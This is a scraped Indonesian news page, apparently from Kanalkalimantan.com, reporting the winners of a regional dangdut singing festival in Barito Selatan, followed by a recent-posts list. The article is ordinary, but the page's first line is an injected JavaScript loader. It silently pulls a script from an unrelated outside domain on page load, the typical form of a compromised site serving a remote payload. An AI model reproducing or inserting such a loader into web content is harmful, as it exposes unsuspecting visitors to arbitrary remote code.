(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Ini Para Juara Festival Dangdut IV Karang Taruna Barsel


BUNTOK, Setelah bersaing ketat 14 finalis pada malam grand final Festival Dangdut IV Karang Taruna Barsel, 7 penyanyi dangdut pria dan 7 penyanyi wanita berebut menjadi yang terbaik.

Ketua Karang Taruna Barsel, Ideham mengatakan, kegiatan ini bertujuan untuk menyalurkan bakat generasi muda dalam bidang seni khusunya musik dangdut. Selain itu kegiatan ini merupakan agenda rutin selalu diselanggarakan setiap tahun.

“Penggemar dangdut di Barsel ini jumlahnya diperkirakan 80 persen lebih, terutama warga dari desa yang berada di DAS Barito itu,” kata Ideham kepada Kanalkalimantan.com, usai acara.

Ideham yang juga anggota DPRD Barsel itu mengatakan, untuk peraih juara kategori pria juara pertama diraih Waldi Mahendra, juara kedua Satria Tirin, juara ketiga diraih atas nama Akhmad Rafa Susanto dan juara harapan pertama Normaidi.

Sedangkan untuk putri juara pertama diraih Andini peserta dari Muara Teweh, juara kedua Yunita Berbie dan juara ketiga Rosmalina serta peserta favorite jatuh pada Sarah Meni asal Barito Timur.

“Untuk semua finalis selain mendapatkan tropi serta piagam mereka juga mendapatkan uang tunai untuk pembinaan,” beber Ideham.

Ditempat yang sama, Pj Sekda Barsel Syahrani usai menutup kegiatan mengucapkan terima kasih kepada pihak Karang taruna yang melaksanakan kegiatan festival dangdut ini.

“Sebanyak 8 peserta akan kita kontrak untuk mengisi acara pada kegiatan Barsel Expo,” ungkap Syahrani.

Ia berharap dengan kegiatan ini bisa menghasilkan talenta yang baik khususnya untuk penyanyi dangdut. Kegiatan yang positif dan banyak bakat terpendam dari para anak muda yang mengikuti festival dangdut ini.

“Kita berharap kegiatan ini bisa menghasilkan penyanyi yang baik dan handal. Kita juga mengucapkan terimakasih kepada Karang Taruna dapat melaksanakan kegiatan seperti ini, sebab selain menyalurkan bakat juga bisa menghibur masyarakat,” pungkas Syahrani. (digdo)

Reporter : Digdo
Editor : Bie

 


Desy Arfianty

Recent Posts

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

4 menit ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

1 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

2 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

2 jam ago

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

3 jam ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

4 jam ago

This website uses cookies.